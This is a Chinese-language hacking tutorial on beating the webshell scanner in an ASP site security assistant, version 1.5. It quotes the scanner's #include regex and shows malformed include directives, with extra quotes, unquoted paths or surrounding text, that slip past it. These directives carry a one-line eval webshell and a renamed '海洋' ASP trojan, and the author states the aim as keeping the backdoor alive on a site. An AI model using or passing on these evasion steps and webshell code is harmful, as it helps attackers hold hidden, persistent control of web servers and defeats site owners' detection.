攻破雷客图ASP站长安全助手

到Lake2网站上下了1.5的源代码，发现这个版本的确改进了不少，又增加了查杀功能:

1:查杀通过了Unicode编码的ASP木马

2:查杀使用了(Open|Create)TextFile， SaveToFile，Save， set Server，Server.(Transfer|Execute)， ShellExecute，Exec，Run方法的文件

3:改变原来以FSO方法中OpenTextFile打开文件的方式，现改为使用ADODB.Stream对方法中的open方式打开

程序增加了这三个功能后，查杀木马的能力大大增强，要突破过去，有难度!难怪不得，Lake2在其网站上称几乎能杀所有ASP木马.今天我们就来看看如何突破它.

当我这次读站长助手代码的时，注意到了这样一个问题:这个ASP站长安全助手使用了大量的正则表达式，对于正则表达式，我个人的看法是:如果匹配得好，要突破很不容易;但是若匹配得不好，我们就可以轻易的突破，一个再强大的系统也将变得不安全.在突破它之前，我们先看看正则表达式的基本语法.

* 匹配前面的子表达式零次或多次。例如，zo* 能匹配 "z" 以及 "zoo"。 * 等价于{0，}。

\\s 匹配任何空白字符，包括空格、制表符、换页符等等。等价于 [ \\f\\n\\r\\t\\v]。

. 匹配除换行符 \\n之外的任何单字符。要匹配 .，请使用 \\。

若我们使用”\\s”和”*”相结合为”\\s*”，最终将匹配0个或多个空格，制表符，换页符等.若我们使用”.”与”*”相结合为”.*”将匹配0个或多个除了换行符之外的字符.有了这些知识后，就让我们来看看它的代码.

在admin_scanwebshell.asp中，有如下代码:

’Check include file with "

Set regEx = New RegExp //建立正则表达式对象

regEx.IgnoreCase = True //忽略大小写

regEx.Global = True //设置为全局匹配

regEx.Pattern = "<!–\\s*#include\\s*file\\s*=\\s*".*"" //模式

Set Matches = regEx.Execute(filetxt) //用正则表达式模式在字符串filetxt中运行查找，并返回包含该查找结果的一个数组， 如果 exec 方法没有找到匹配，则它返回 null

For Each Match in Matches

tFile = Replace(Mid(Match.Value， Instr(Match.Value， """) 1， Len(Match.Value) – Instr(Match.Value， """) – 1)，"/"，"\\") //进行查找和替换工作

If Not CheckExt(FSOs.GetExtensionName(tFile)) Then //若是属于被检查的后缀名，则进行下一步的查杀工作

Call ScanFile( Mid(FilePath，1，InStrRev(FilePath，"\\"))&tFile， replace(FilePath，server.MapPath("\\")&"\\"，""，1，1，1) ) //调用文件进行查杀

SumFiles = SumFiles 1

End If

(注:在另一文件中使用几乎相同的函数，只是把上面函数的双引号换成了单引号)

下面，我们一起来分析这个程序的执行过程，在这里，假如我们使用了”<!–#include file="1.txt"–>”.程序按照设置好的正则表达式模式regEx.Pattern = "<!–\\s*#include\\s*file\\s*=\\s*".*""在filetxt中进行查找， 并返回包含该查找结果的一个数组，因为我们的字符串:<!–#include file="1.txt"–>和设置好的正则表达式模式相符，所以返回包含该查找结果的一个数组.然后再进行查找和替换和查杀操作，要是我们能构造一个字符串，让它不符合这个模式，那么将返回NULL，也就不会杀我们的ASP马，下面我们来实验:

第一步:

1:新建一个文件ttfct.txt，其内容为:<%eval request(“go”)%>.

2:新建一个文件nokill.asp，其内容为<!–#include file=”ttfct.txt”–>

用雷客图ASP站长安全助手1.5进行查.

用Lake2的一句客服端连接，显示正常.

第二步:

修改nokill.asp，使其内容为<!–#include file=”ttfct.t”ss”xt”–>，再次连接.

不知道大家注意到这一句没有: Active Server Pages， ASP 0126 (0x80004005)，找不到包含文件 ’ttfct.t’。/ttfct/nokill.asp， 第 1 行

为什么我们这里只有ttfct.t，那xt难道被吃了不成?的确，xt就是被吃了，因为被截断了.那我们把xt补上，其内容变为: <!–#include file=”ttfct.txt”ss”xt”–>，再次提交，结果成功，显示效果和图二相同.拿我们现在构造的语句: <!–#include file=”ttfct.txt”ss”xt”–>和regEx.Pattern = "<!–\\s*#include\\s*file\\s*=\\s*".*""进行匹配，大家发现没有，我们的语句有4个引号，而此匹配的语句只有两个引号，当然匹配就不会成功了.下面查杀的结果证明了我的分析.

“Include file=”后面可以加字符串，那么，两边能加不，为此，我们改内容为 "ttfct"<!–#include file="ttfct.txt"–>"同样能成功连接并且突破雷客图ASP站长安全助手，我们再构造: <!–#include file=ttfct.txt–>(注意:ttfct.txt两边没有引号)，这样就都能成功的让我们的一句话木马长久的活下去.

一句话木马起始回生，用同样的方法我们可以让海洋ASP木马躲过它的查杀，具体方法是，把海洋ASP木马的后缀改为.dll，.hack等，随便你，大家任意发挥，改成你的名字都可以:).

然后我们新建一个文件命名为hy.asp，将代码<!–#include file="hy.dll”stssst"–>放进去，通过访问hy.asp也就调用了海洋了.

总结:除了对ASP语言了解之外，我们还要通过实践，这样，才得真正的走向成功的大门.

如果你对此免杀还有更好的方法，欢迎来和我交流，我的ID是TTFCT.